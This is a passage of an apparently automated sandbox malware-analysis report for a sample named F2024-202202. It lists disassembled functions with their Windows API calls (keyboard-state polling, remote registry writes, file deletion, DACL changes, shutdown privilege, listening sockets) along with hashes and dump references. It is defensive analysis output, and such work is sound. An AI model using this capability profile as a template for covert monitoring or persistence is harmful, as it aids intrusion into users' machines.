              • FindNextFileW.KERNEL32(00000000,00000010), ref: 001EF330
              • FindClose.KERNEL32(00000000), ref: 001EF33D
              • FindClose.KERNEL32(00000000), ref: 001EF34F
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
              • String ID: *.*
              • API String ID: 1803514871-438819550
              • Opcode ID: c7ab0ec1bb831a749da74a8c8b59efa46fd40a275365f40e6c668d8d8c7376f0
              • Instruction ID: 6728d73a74e0f0f673c9a6268565818a93e7055173e767e87dd7c84cddfe7631
              • Opcode Fuzzy Hash: c7ab0ec1bb831a749da74a8c8b59efa46fd40a275365f40e6c668d8d8c7376f0
              • Instruction Fuzzy Hash: 5F31E67A5406596EDB20DBB5EC4CADE73ACAF09360F10017AFD14D3091EB30DA46CA50
              Function 00200AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
              Download Yara Rule
              APIs
              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00200BDE
              • RegCreateKeyExW.ADVAPI32(?,?,00000000,0020F910,00000000,?,00000000,?,?), ref: 00200C4C
              • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00200C94
              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00200D1D
              • RegCloseKey.ADVAPI32(?), ref: 0020103D
              • RegCloseKey.ADVAPI32(00000000), ref: 0020104A
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Close$ConnectCreateRegistryValue
              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
              • API String ID: 536824911-966354055
              • Opcode ID: f6612ed210845c146097693add6fa6691d172ced17deca20f6af198237438612
              • Instruction ID: aa2d508bee08013c6a38c8c83fe71fd786be7f3b0aa07d8ed49513e7528801c3
              • Opcode Fuzzy Hash: f6612ed210845c146097693add6fa6691d172ced17deca20f6af198237438612
              • Instruction Fuzzy Hash: E90248756107129FDB14EF24C895E2AB7E5FF89714F04885DF88A9B2A2CB30ED51CB81
              Function 001EF35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
              Download Yara Rule
              APIs
              • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 001EF37E
              • _wcscmp.LIBCMT ref: 001EF393
              • _wcscmp.LIBCMT ref: 001EF3AA
                • Part of subcall function 001E45C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 001E45DC
              • FindNextFileW.KERNEL32(00000000,?), ref: 001EF3D9
              • FindClose.KERNEL32(00000000), ref: 001EF3E4
              • FindFirstFileW.KERNEL32(*.*,?), ref: 001EF400
              • _wcscmp.LIBCMT ref: 001EF427
              • _wcscmp.LIBCMT ref: 001EF43E
              • SetCurrentDirectoryW.KERNEL32(?), ref: 001EF450
              • SetCurrentDirectoryW.KERNEL32(0023A5A0), ref: 001EF46E
              • FindNextFileW.KERNEL32(00000000,00000010), ref: 001EF478
              • FindClose.KERNEL32(00000000), ref: 001EF485
              • FindClose.KERNEL32(00000000), ref: 001EF497
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
              • String ID: *.*
              • API String ID: 1824444939-438819550
              • Opcode ID: 1bcd8bb62346114c3a890bed189eb9300c478b44b2b970725dd75ef080ef77a8
              • Instruction ID: 9f1850470fc302e054377b7298297bd849dc642dad7721e07f86ebc596ffdb8b
              • Opcode Fuzzy Hash: 1bcd8bb62346114c3a890bed189eb9300c478b44b2b970725dd75ef080ef77a8
              • Instruction Fuzzy Hash: A231F8725016996FCB21AFA5EC88ADE77ACAF49324F100179FC50E30E1E730DE46CA54
              Function 001D81F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 001D874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 001D8766
                • Part of subcall function 001D874A: GetLastError.KERNEL32(?,001D822A,?,?,?), ref: 001D8770
                • Part of subcall function 001D874A: GetProcessHeap.KERNEL32(00000008,?,?,001D822A,?,?,?), ref: 001D877F
                • Part of subcall function 001D874A: HeapAlloc.KERNEL32(00000000,?,001D822A,?,?,?), ref: 001D8786
                • Part of subcall function 001D874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 001D879D
                • Part of subcall function 001D87E7: GetProcessHeap.KERNEL32(00000008,001D8240,00000000,00000000,?,001D8240,?), ref: 001D87F3
                • Part of subcall function 001D87E7: HeapAlloc.KERNEL32(00000000,?,001D8240,?), ref: 001D87FA
                • Part of subcall function 001D87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,001D8240,?), ref: 001D880B
              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 001D825B
              • _memset.LIBCMT ref: 001D8270
              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 001D828F
              • GetLengthSid.ADVAPI32(?), ref: 001D82A0
              • GetAce.ADVAPI32(?,00000000,?), ref: 001D82DD
              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001D82F9
              • GetLengthSid.ADVAPI32(?), ref: 001D8316
              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 001D8325
              • HeapAlloc.KERNEL32(00000000), ref: 001D832C
              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 001D834D
              • CopySid.ADVAPI32(00000000), ref: 001D8354
              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 001D8385
              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 001D83AB
              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 001D83BF
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
              • String ID:
              • API String ID: 3996160137-0
              • Opcode ID: 8fa4a4a9edc812fc7f29bbfa8473e941bf9706bf016805b3ab86ea658c5cae5f
              • Instruction ID: 13f4803bc5333799351d6948ef2294def24c12865ddbbf5cff87a2269dbebce3
              • Opcode Fuzzy Hash: 8fa4a4a9edc812fc7f29bbfa8473e941bf9706bf016805b3ab86ea658c5cae5f
              • Instruction Fuzzy Hash: A1614771900209BBDF10DFA5DD88AAEBBB9FF04710F14816AF919A7291DB31DA15CB60
              Function 00196843 Relevance: 19.6, Strings: 15, Instructions: 883COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID:
              • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$PJ"$UCP)$UTF)$UTF16)
              • API String ID: 0-3652197027
              • Opcode ID: fd2fb56e9da62f0edf3252be174633ef2eea34d0c0e7b8019de1100b49ff07ea
              • Instruction ID: 53c4d8fdf91a7ee789bf5f5cbb431412d957cac778533f9245140ea0fad462ed
              • Opcode Fuzzy Hash: fd2fb56e9da62f0edf3252be174633ef2eea34d0c0e7b8019de1100b49ff07ea
              • Instruction Fuzzy Hash: 63726175E00219ABDF28CF98C8907AEB7B5FF58310F15816AE959EB390D7709E41CB90
              Function 00200665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 002010A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00200038,?,?), ref: 002010BC
              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00200737
                • Part of subcall function 00189997: __itow.LIBCMT ref: 001899C2
                • Part of subcall function 00189997: __swprintf.LIBCMT ref: 00189A0C
              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 002007D6
              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0020086E
              • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00200AAD
              • RegCloseKey.ADVAPI32(00000000), ref: 00200ABA
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
              • String ID:
              • API String ID: 1240663315-0
              • Opcode ID: c04ed9adff6e10b959d629ed1bbe1481610745c10ebdbd3460596f4db9280b42
              • Instruction ID: 1d3220ff7ab7ce314bc88d31e52d80502f7d4d8c6603c4ed89179b5bed32a9b7
              • Opcode Fuzzy Hash: c04ed9adff6e10b959d629ed1bbe1481610745c10ebdbd3460596f4db9280b42
              • Instruction Fuzzy Hash: EAE15C31614311AFDB14DF28C885E2ABBE5EF89714F04896DF48ADB2A2DB30ED11CB51
              Function 001E0219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
              Download Yara Rule
              APIs
              • GetKeyboardState.USER32(?), ref: 001E0241
              • GetAsyncKeyState.USER32(000000A0), ref: 001E02C2
              • GetKeyState.USER32(000000A0), ref: 001E02DD
              • GetAsyncKeyState.USER32(000000A1), ref: 001E02F7
              • GetKeyState.USER32(000000A1), ref: 001E030C
              • GetAsyncKeyState.USER32(00000011), ref: 001E0324
              • GetKeyState.USER32(00000011), ref: 001E0336
              • GetAsyncKeyState.USER32(00000012), ref: 001E034E
              • GetKeyState.USER32(00000012), ref: 001E0360
              • GetAsyncKeyState.USER32(0000005B), ref: 001E0378
              • GetKeyState.USER32(0000005B), ref: 001E038A
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: State$Async$Keyboard
              • String ID:
              • API String ID: 541375521-0
              • Opcode ID: 9c07de8ae21ac4952f5f4b5d8bfa9d67ac3e95e9678222da49cc066661f4846f
              • Instruction ID: bc13ff33c45f1e07f305ca422d9381a3fb855c25c695acb833e450b7e3e72bf3
              • Opcode Fuzzy Hash: 9c07de8ae21ac4952f5f4b5d8bfa9d67ac3e95e9678222da49cc066661f4846f
              • Instruction Fuzzy Hash: 2841C924904FCA6EFF738A6598083ADBEE0BF19340F48409DD6C6465C3E7E459C887A2
              Function 001F4458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
              • String ID:
              • API String ID: 1737998785-0
              • Opcode ID: 1c5559de866383784d60f9a18d381cae7a68b215ad4a29f859cbbf5037c04302
              • Instruction ID: af3399d9875f8bdb7ad948330d2e539f94b07613a897794bf567a822d3f308d3
              • Opcode Fuzzy Hash: 1c5559de866383784d60f9a18d381cae7a68b215ad4a29f859cbbf5037c04302
              • Instruction Fuzzy Hash: 3221BF35240224AFDB20AF60ED4DB7E77A8EF14310F14802AF946DB2B2DB71AD00CB84
              Function 001E3A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 001848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001848A1,?,?,001837C0,?), ref: 001848CE
                • Part of subcall function 001E4CD3: GetFileAttributesW.KERNEL32(?,001E3947), ref: 001E4CD4
              • FindFirstFileW.KERNEL32(?,?), ref: 001E3ADF
              • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 001E3B87
              • MoveFileW.KERNEL32(?,?), ref: 001E3B9A
              • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 001E3BB7
              • FindNextFileW.KERNEL32(00000000,00000010), ref: 001E3BD9
              • FindClose.KERNEL32(00000000,?,?,?,?), ref: 001E3BF5
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
              • String ID: \*.*
              • API String ID: 4002782344-1173974218
              • Opcode ID: 7809b21d0ccea170730f0297e84457a45f58967b92dadec400eca9e39d39b363
              • Instruction ID: d2c1e52442d594b50a4139a15a695307ec24d04eb8077f9a79671981a30568d4
              • Opcode Fuzzy Hash: 7809b21d0ccea170730f0297e84457a45f58967b92dadec400eca9e39d39b363
              • Instruction Fuzzy Hash: 765183318016899BCF15FBA1DE968EDB7B9AF64300F6441A5E45277092EF31AF09CF60
              Function 001EF65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00187F41: _memmove.LIBCMT ref: 00187F82
              • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 001EF6AB
              • Sleep.KERNEL32(0000000A), ref: 001EF6DB
              • _wcscmp.LIBCMT ref: 001EF6EF
              • _wcscmp.LIBCMT ref: 001EF70A
              • FindNextFileW.KERNEL32(?,?), ref: 001EF7A8
              • FindClose.KERNEL32(00000000), ref: 001EF7BE
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
              • String ID: *.*
              • API String ID: 713712311-438819550
              • Opcode ID: d3c801316e02744eb49f9923486069b8b672857b46169af68eacc1c36d388056
              • Instruction ID: 097b3ab4eb04b244626270a2963658f52b7d99f3681fa33d35f5ef0eee459740
              • Opcode Fuzzy Hash: d3c801316e02744eb49f9923486069b8b672857b46169af68eacc1c36d388056
              • Instruction Fuzzy Hash: 59418D71D0024A9FCF55EF65CC89AEEBBB4FF19310F14456AE815A21A1EB309E45CFA0
              Function 00194140 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1132COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID:
              • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
              • API String ID: 0-1546025612
              • Opcode ID: 115d4e796b40c42bd02c081cb4f680f0b7c8b1df0d8d9971f655e4ca7e3529ed
              • Instruction ID: beb0116f4d56d3fb50f98f66f59d08d72a29d66e3a88486206818105d9ac8435
              • Opcode Fuzzy Hash: 115d4e796b40c42bd02c081cb4f680f0b7c8b1df0d8d9971f655e4ca7e3529ed
              • Instruction Fuzzy Hash: 73A26F74E0421ACBDF28CF98C990BBDB7B1BB64314F1581AAD856A7280D774DE82CF51
              Function 001958C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: _memmove
              • String ID:
              • API String ID: 4104443479-0
              • Opcode ID: e7d5a260fb76cce847afb5088ea5685d445e33952aa346a93dfa3e56ab16ae7e
              • Instruction ID: 32ae33a7ba84e342c1562abbcc9740f6fbcff378d317497ee764f558f545730f
              • Opcode Fuzzy Hash: e7d5a260fb76cce847afb5088ea5685d445e33952aa346a93dfa3e56ab16ae7e
              • Instruction Fuzzy Hash: 3B128C70A00609EFDF19DFA4D985AAEB7F6FF58300F10456AE406E7291EB35AE11CB50
              Function 001E545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 001D8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001D8D0D
                • Part of subcall function 001D8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 001D8D3A
                • Part of subcall function 001D8CC3: GetLastError.KERNEL32 ref: 001D8D47
              • ExitWindowsEx.USER32(?,00000000), ref: 001E549B
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
              • String ID: $@$SeShutdownPrivilege
              • API String ID: 2234035333-194228
              • Opcode ID: e94fd95b80c54c4fe4ca9aa87619bc3df7b0832973691a6a3a3e208a6be7be6e
              • Instruction ID: 930bef00ddd3aeb1bb93e4c5d9dd6963c72f11ea412dd32df371c340e6f54a1b
              • Opcode Fuzzy Hash: e94fd95b80c54c4fe4ca9aa87619bc3df7b0832973691a6a3a3e208a6be7be6e
              • Instruction Fuzzy Hash: E001DF31695F556AF77C667AAC4ABBE729AAB05756F240125FC06D20D3FB901C8082A0
              Function 001F6596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
              Download Yara Rule
              APIs
              • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 001F65EF
              • WSAGetLastError.WSOCK32(00000000), ref: 001F65FE
              • bind.WSOCK32(00000000,?,00000010), ref: 001F661A
              • listen.WSOCK32(00000000,00000005), ref: 001F6629
              • WSAGetLastError.WSOCK32(00000000), ref: 001F6643
              • closesocket.WSOCK32(00000000,00000000), ref: 001F6657
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ErrorLast$bindclosesocketlistensocket
              • String ID:
              • API String ID: 1279440585-0
              • Opcode ID: 9dfd5cea9278d43e67570448c7e3182f8180bb1549254ebcd82e38b8cb27e7bb
              • Instruction ID: d90ff25b6275ebb09262ed29f89ced1c88d1d09fa82339e0c38bc99a4f2499c5
              • Opcode Fuzzy Hash: 9dfd5cea9278d43e67570448c7e3182f8180bb1549254ebcd82e38b8cb27e7bb
              • Instruction Fuzzy Hash: 34217E316402149FCB10EF64D989B7EB7A9EF44720F158259EA56E73E2CB70AD018B51
              Function 00195680 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 001A0FF6: std::exception::exception.LIBCMT ref: 001A102C
                • Part of subcall function 001A0FF6: __CxxThrowException@8.LIBCMT ref: 001A1041
              • _memmove.LIBCMT ref: 001D062F
              • _memmove.LIBCMT ref: 001D0744
              • _memmove.LIBCMT ref: 001D07EB
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: _memmove$Exception@8Throwstd::exception::exception
              • String ID:
              • API String ID: 1300846289-0
              • Opcode ID: 2c7c21ddaac8861f9bb19df5e772071fc29bebf87a8f2a582e55ae2c1a87d39f
              • Instruction ID: 1273668ca1323a21b48713b43c05d76e595539d24fd0c8566d5b33f67e66479a
              • Opcode Fuzzy Hash: 2c7c21ddaac8861f9bb19df5e772071fc29bebf87a8f2a582e55ae2c1a87d39f
              • Instruction Fuzzy Hash: ED028070E00205EFDF09DF64D985AAEBBB5EF58300F15806AE806EB355EB31DA51CB91
              Function 00181287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00182612: GetWindowLongW.USER32(?,000000EB), ref: 00182623
              • DefDlgProcW.USER32(?,?,?,?,?), ref: 001819FA
              • GetSysColor.USER32(0000000F), ref: 00181A4E
              • SetBkColor.GDI32(?,00000000), ref: 00181A61
                • Part of subcall function 00181290: DefDlgProcW.USER32(?,00000020,?), ref: 001812D8
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
